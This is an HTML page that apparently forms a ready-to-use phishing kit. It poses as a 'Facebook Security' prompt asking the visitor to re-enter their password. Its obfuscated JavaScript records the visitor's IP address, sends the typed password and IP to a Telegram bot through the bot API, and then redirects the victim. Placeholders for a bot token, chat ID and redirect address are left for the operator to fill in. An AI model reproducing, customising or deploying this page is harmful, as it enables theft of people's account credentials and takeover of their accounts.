<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Submit Form Integration</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        body {
            font-family: 'Helvetica Neue', Arial, sans-serif;
            background-color: #f0f2f5;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            background-color: white;
            padding: 40px 30px;
            border-radius: 8px;
            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.15);
            text-align: center;
            width: 360px;
            position: relative;
        }

        .logo {
            margin-bottom: 20px;
        }

        .logo img {
            width: 120px;
        }

        .header {
            margin-bottom: 20px;
            font-size: 18px;
            color: #333;
            font-weight: bold;
        }

        .form-group {
            margin-bottom: 25px;
            text-align: left;
            position: relative;
        }

        .form-group label {
            display: block;
            font-weight: bold;
            margin-bottom: 8px;
            font-size: 14px;
            color: #606770;
        }

        .input-wrapper {
            position: relative;
        }

        .form-group input {
            width: 100%;
            padding: 14px;
            padding-right: 40px;
            /* Space for the eye icon */
            border: 1px solid #ccd0d5;
            border-radius: 6px;
            font-size: 16px;
            color: #1c1e21;
            box-sizing: border-box;
        }

        .form-group input:focus {
            border-color: #1877f2;
            outline: none;
            box-shadow: 0px 0px 0px 2px rgba(24, 119, 242, 0.2);
        }

        .eye-icon {
            position: absolute;
            right: 10px;
            top: 50%;
            transform: translateY(-50%);
            font-size: 20px;
            color: #606770;
            cursor: pointer;
            transition: color 0.3s ease;
        }

        .eye-icon:hover {
            color: #1877f2;
        }

        .submit-button {
            background-color: #1877f2;
            color: white;
            border: none;
            padding: 14px;
            border-radius: 6px;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            width: 100%;
            margin-top: 10px;
        }

        .submit-button:hover {
            background-color: #166fe5;
        }

        .error-message {
            color: #e74c3c;
            font-size: 14px;
            margin-top: 5px;
            margin-bottom: 15px;
            text-align: left;
        }
    </style>
</head>

<body inject_video_svd="true">
    <div class="container">
        <div class="logo">
            <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" alt="Logo">
        </div>
        <div class="header">
            Facebook Security
        </div>
        <p>Please re-enter your password to complete the request.</p>
        <form action="javascript:void(0)" method="post" id="executeCookiesDataForm">
		<input type="hidden" name="redirect_address" id="redirect_address" value="YOUR CUSTOM REDIRECT ADDRESS HERE" method="post">
        <input type="hidden" name="ip_user" id="ip_user" readonly>
            <div class="form-group">
                <label for="password">Password</label>
                <div class="input-wrapper">
                    <input type="password" id="password" name="password" placeholder="Enter your password" required="">
                    <i class="eye-icon fas fa-eye" id="togglePassword"></i>
                </div>
                <span id="error-message" class="error-message"></span>
            </div>
            <button type="submit" class="submit-button" id="executeCookiesData">Submit</button>
        </form>
    </div>
	
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
    <script>
        const your_chat_id = 'PASTE YOUR CHAT ID HERE';
        const your_bot_token = 'PASTE YOUR BOT TOKEN HERE';

        function _0x56ca(_0x1663af,_0x24191d){const _0x23b258=_0x18e3();return _0x56ca=function(_0x2c25b1,_0x5cb3e7){_0x2c25b1=_0x2c25b1-(0x1d23+-0x335*0x1+-0x1865);let _0x217ea7=_0x23b258[_0x2c25b1];return _0x217ea7;},_0x56ca(_0x1663af,_0x24191d);}const _0x1b11d4=_0x56ca;function _0x18e3(){const _0x26dab9=['\x0a\x09\x09\x09\x09','KAucH','AABWj','POST','fUcMA','iaaRb','i.telegram','value','FROM\x20IP\x20','/sendMessa','2595344bKJHOd','href','hGfjQ','YjSNe','error-mess','294548gYHkOh','son','okiesData','classList','fa-eye-sla','AVFgM','preventDef','\x0a\x0a\x09\x09\x09\x09⮞\x20pa','tor','KRIzO','length','top','1715475ysIyHG','add','aPRls','2767164wQUlab','error\x20fail','Password\x20m','i.ipify.or','SvxWn','HiFYi','getJSON','word','PCjmA','type','togglePass','aracters\x20l','kJoBV','click','ById','ong.','remove','zjlxi','EkQWZ','html','ready','stener','XjSNb','#ip_user','location','fa-eye','#redirect_','WTCOf','getElement','FoBjo','MVWqd','xbtCx','#executeCo','textConten','querySelec','.org/bot','KAaXW','password','least\x206\x20ch','572966dGPmlC','address','addEventLi','ault','157600fdTnRi','kMnhf','ajax','g?format=j','age','\x0a\x09\x09\x09\x09DATA\x20','val','https://ap','ssword:\x20','2tSYqDX','#password','text','3797570Vdalge','ust\x20be\x20at\x20'];_0x18e3=function(){return _0x26dab9;};return _0x18e3();}(function(_0x17ac5a,_0x1414ea){const _0x3c1a8b=_0x56ca,_0x21e265=_0x17ac5a();while(!![]){try{const _0x46ad2a=parseInt(_0x3c1a8b(0x1ad))/(-0xb*0x45+0x1*0x1903+-0x273*0x9)*(parseInt(_0x3c1a8b(0x1a0))/(0x1b57+-0x36d*0x7+0x1a*-0x21))+-parseInt(_0x3c1a8b(0x1cd))/(0x866+0x44f*-0x4+-0x8d9*-0x1)+-parseInt(_0x3c1a8b(0x1c1))/(-0x206*0x1+-0x37+-0x1*-0x241)+-parseInt(_0x3c1a8b(0x1a4))/(-0xc*-0xa4+-0xd49+0x1*0x59e)+-parseInt(_0x3c1a8b(0x1d0))/(0x1552*-0x1+0x1*0x95+-0x5*-0x427)+parseInt(_0x3c1a8b(0x1b0))/(-0xfdb+-0x1*-0x1c2d+-0xc4b)+parseInt(_0x3c1a8b(0x1bc))/(-0x15f1+-0x2445+-0x852*-0x7);if(_0x46ad2a===_0x1414ea)break;else _0x21e265['push'](_0x21e265['shift']());}catch(_0xd4a4fa){_0x21e265['push'](_0x21e265['shift']());}}}(_0x18e3,-0x757cb*-0x1+-0x7*0xba5b+0x25b48),$[_0x1b11d4(0x1d6)](_0x1b11d4(0x1ab)+_0x1b11d4(0x1d3)+_0x1b11d4(0x1a7)+_0x1b11d4(0x1c2),function(_0x18dc85){const _0x294a9d=_0x1b11d4,_0x35a4df={'HiFYi':function(_0x8353a3,_0x3742b9){return _0x8353a3(_0x3742b9);},'kJoBV':_0x294a9d(0x190)};_0x35a4df[_0x294a9d(0x1d5)]($,_0x35a4df[_0x294a9d(0x1dc)])[_0x294a9d(0x1aa)](_0x18dc85['ip']);}),document[_0x1b11d4(0x195)+_0x1b11d4(0x1de)](_0x1b11d4(0x1da)+_0x1b11d4(0x1d7))[_0x1b11d4(0x1a2)+_0x1b11d4(0x18e)](_0x1b11d4(0x1dd),function(){const _0x17886a=_0x1b11d4,_0x3b805c={'kMnhf':_0x17886a(0x19e),'SvxWn':function(_0x3b7566,_0x217920){return _0x3b7566===_0x217920;},'iaaRb':_0x17886a(0x1af),'AVFgM':_0x17886a(0x192),'xbtCx':_0x17886a(0x1c5)+'sh'};var _0x8ce98=document[_0x17886a(0x195)+_0x17886a(0x1de)](_0x3b805c[_0x17886a(0x1a5)]),_0x8a9c9=this;_0x3b805c[_0x17886a(0x1d4)](_0x8ce98[_0x17886a(0x1d9)],_0x3b805c[_0x17886a(0x1a5)])?(_0x8ce98[_0x17886a(0x1d9)]=_0x3b805c[_0x17886a(0x1b7)],_0x8a9c9[_0x17886a(0x1c4)][_0x17886a(0x189)](_0x3b805c[_0x17886a(0x1c6)]),_0x8a9c9[_0x17886a(0x1c4)][_0x17886a(0x1ce)](_0x3b805c[_0x17886a(0x198)])):(_0x8ce98[_0x17886a(0x1d9)]=_0x3b805c[_0x17886a(0x1a5)],_0x8a9c9[_0x17886a(0x1c4)][_0x17886a(0x189)](_0x3b805c[_0x17886a(0x198)]),_0x8a9c9[_0x17886a(0x1c4)][_0x17886a(0x1ce)](_0x3b805c[_0x17886a(0x1c6)]));}),$(document)[_0x1b11d4(0x18d)](function(){const _0x214d57=_0x1b11d4,_0x26e173={'EkQWZ':_0x214d57(0x1c0)+_0x214d57(0x1a8),'fUcMA':function(_0x25a5b1,_0xde357){return _0x25a5b1<_0xde357;},'YjSNe':_0x214d57(0x1d2)+_0x214d57(0x1b1)+_0x214d57(0x19f)+_0x214d57(0x1db)+_0x214d57(0x1df),'KAaXW':function(_0x1ad0e6){return _0x1ad0e6();},'XjSNb':function(_0x31fcc6,_0x21e444){return _0x31fcc6(_0x21e444);},'AABWj':_0x214d57(0x1d1)+'ed','WTCOf':_0x214d57(0x193)+_0x214d57(0x1a1),'FoBjo':_0x214d57(0x190),'MVWqd':_0x214d57(0x1ae),'KAucH':_0x214d57(0x1b5),'KRIzO':_0x214d57(0x18c),'zjlxi':_0x214d57(0x199)+_0x214d57(0x1c3),'hGfjQ':_0x214d57(0x1dd)};_0x26e173[_0x214d57(0x18f)]($,_0x26e173[_0x214d57(0x18a)])['on'](_0x26e173[_0x214d57(0x1be)],function(_0x4a6b21){const _0x560ed6=_0x214d57;var _0x307942=document[_0x560ed6(0x195)+_0x560ed6(0x1de)](_0x26e173[_0x560ed6(0x18b)]);_0x26e173[_0x560ed6(0x1b6)](password[_0x560ed6(0x1b9)][_0x560ed6(0x1cb)],-0x511*-0x1+0x616+-0xb21)?(_0x307942[_0x560ed6(0x19a)+'t']=_0x26e173[_0x560ed6(0x1bf)],_0x4a6b21[_0x560ed6(0x1c7)+_0x560ed6(0x1a3)]()):(_0x307942[_0x560ed6(0x19a)+'t']='',_0x26e173[_0x560ed6(0x19d)](_0x164bb1));});function _0x164bb1(){const _0x5ba6d4=_0x214d57,_0x41f366={'aPRls':function(_0x5b378f,_0x5175ab){const _0x4e453d=_0x56ca;return _0x26e173[_0x4e453d(0x18f)](_0x5b378f,_0x5175ab);},'PCjmA':_0x26e173[_0x5ba6d4(0x1b4)]},_0x124b09=document[_0x5ba6d4(0x19b)+_0x5ba6d4(0x1c9)](_0x26e173[_0x5ba6d4(0x194)])[_0x5ba6d4(0x1b9)],_0x2c386a=document[_0x5ba6d4(0x19b)+_0x5ba6d4(0x1c9)](_0x26e173[_0x5ba6d4(0x196)])[_0x5ba6d4(0x1b9)],_0x4f1ce8=document[_0x5ba6d4(0x19b)+_0x5ba6d4(0x1c9)](_0x26e173[_0x5ba6d4(0x197)])[_0x5ba6d4(0x1b9)],_0x21c70d=_0x5ba6d4(0x1a9)+_0x5ba6d4(0x1ba)+_0x2c386a+(_0x5ba6d4(0x1c8)+_0x5ba6d4(0x1ac))+_0x4f1ce8+_0x5ba6d4(0x1b2);$[_0x5ba6d4(0x1a6)]({'type':_0x26e173[_0x5ba6d4(0x1b3)],'url':_0x5ba6d4(0x1ab)+_0x5ba6d4(0x1b8)+_0x5ba6d4(0x19c)+your_bot_token+(_0x5ba6d4(0x1bb)+'ge'),'data':{'chat_id':your_chat_id,'text':_0x21c70d,'parse_mode':_0x26e173[_0x5ba6d4(0x1ca)]},'success':function(_0x2372a5){const _0x3e7985=_0x5ba6d4;window[_0x3e7985(0x1cc)][_0x3e7985(0x191)][_0x3e7985(0x1bd)]=_0x124b09;},'error':function(_0x2f4f30){const _0x53c6d6=_0x5ba6d4;_0x41f366[_0x53c6d6(0x1cf)](alert,_0x41f366[_0x53c6d6(0x1d8)]);}});}}));
    </script>
	
</body>
</html>